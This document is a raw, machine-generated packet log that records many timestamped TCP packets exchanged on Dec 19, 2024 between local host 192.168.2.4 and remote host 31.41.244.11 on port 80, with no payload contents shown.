                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.557497025 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.558391094 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.558444977 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.558538914 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.559514999 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.559582949 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.559640884 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.559662104 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.560609102 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.560671091 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.560724020 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.560791016 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.561724901 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.561805964 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.561821938 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.562366009 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.562844992 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.562958956 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.562998056 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.563961983 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.564034939 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.564049006 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.564274073 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.565066099 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.565155983 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.565196037 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.565305948 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.566179991 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.566338062 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.566397905 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.567277908 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.567334890 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.567390919 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.568389893 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.568479061 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.568527937 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.569463968 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.569497108 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.569556952 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.569597006 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.569653034 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.570611954 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.570713043 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.570719004 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.570766926 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.571748018 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.571846008 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.571852922 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.572825909 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.572917938 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.572942972 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.573520899 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.573939085 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.574022055 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.574063063 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.574338913 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.575048923 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.575134993 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.575198889 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.575977087 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.576215982 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.576327085 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.576355934 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.576411009 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.577321053 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.577423096 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.577539921 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.578408003 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.578479052 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.578550100 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.713193893 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.713330030 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.713490009 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.713711023 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.713762999 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.713831902 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.713923931 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.714828014 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.714960098 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.715059042 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.715902090 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.716029882 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.716089964 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.717022896 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.717210054 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.717216969 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.717307091 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.718152046 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.718231916 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.718341112 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.719240904 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.719364882 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.719377995 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.719454050 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.720343113 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.720447063 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.720516920 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.721472979 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.721543074 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.721580029 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.721695900 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.722565889 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.722662926 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.722683907 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.722733974 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.723714113 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.723818064 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.723978043 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.724808931 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.724894047 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.724930048 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.725003004 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.725892067 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.726011992 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.726011992 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.726124048 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.726998091 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.727075100 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.727142096 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.727828979 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.728180885 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.728235960 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.728423119 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.729242086 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.729370117 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.729485035 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.730340958 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.730417013 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.730463982 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.730535030 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.731461048 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.731518030 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.731585979 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.732628107 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.732748985 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.732765913 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.732832909 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.733726978 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.733831882 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.733839035 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.734349966 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.734812975 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.734914064 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.734926939 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.735002041 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.735954046 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.736057043 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.736063957 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.736867905 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.737041950 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.737170935 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.737297058 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.738184929 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.738250971 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.738267899 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.738331079 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.739274025 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.739393950 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.739610910 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.740367889 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.740487099 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.740595102 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.741487026 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.741599083 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.741605997 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.742422104 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.742603064 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.742717028 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.742772102 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.743720055 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.743769884 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.743830919 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.743901014 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.744824886 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.744934082 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.744935036 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.744997978 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.745917082 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.746001005 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.746032000 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.746215105 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.747040987 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.747136116 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.747268915 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.748141050 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.748311996 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.748325109 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.748464108 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.749244928 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.749341965 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.749392033 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.749464035 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.750349998 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.750421047 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.750471115 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.750595093 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.751472950 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.751597881 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.751600981 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.751661062 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.752589941 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.752691984 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.752752066 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.753705978 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.753843069 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.753911018 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.754806042 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.754865885 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.754921913 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.755186081 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.755919933 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.756052017 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.756134987 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.757179022 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.757281065 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.757308960 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.757514000 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.758152008 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.758213043 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.758279085 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.758429050 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.759234905 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.759378910 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.759493113 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.760360956 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.760483980 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.760679007 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.761487961 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.761606932 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.761629105 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.762144089 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.762574911 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.762696028 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.762780905 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.763717890 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.763849020 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.763849020 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.763926983 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.764848948 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.764964104 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.765027046 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.765912056 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.765975952 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.766032934 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.766408920 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.767020941 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.767146111 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.767172098 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.767221928 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.768171072 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.768229008 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.768316984 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.768423080 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.769256115 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.769325972 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.769370079 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.770369053 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.770452023 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.770492077 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.770647049 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.771485090 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.771565914 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.905114889 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.905184031 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.905204058 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.905635118 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.905715942 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.905788898 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.906183004 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.906733036 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.907025099 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.907126904 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.907222986 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.907223940 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.907294989 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.908262014 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.908358097 CET4991080192.168.2.431.41.244.11
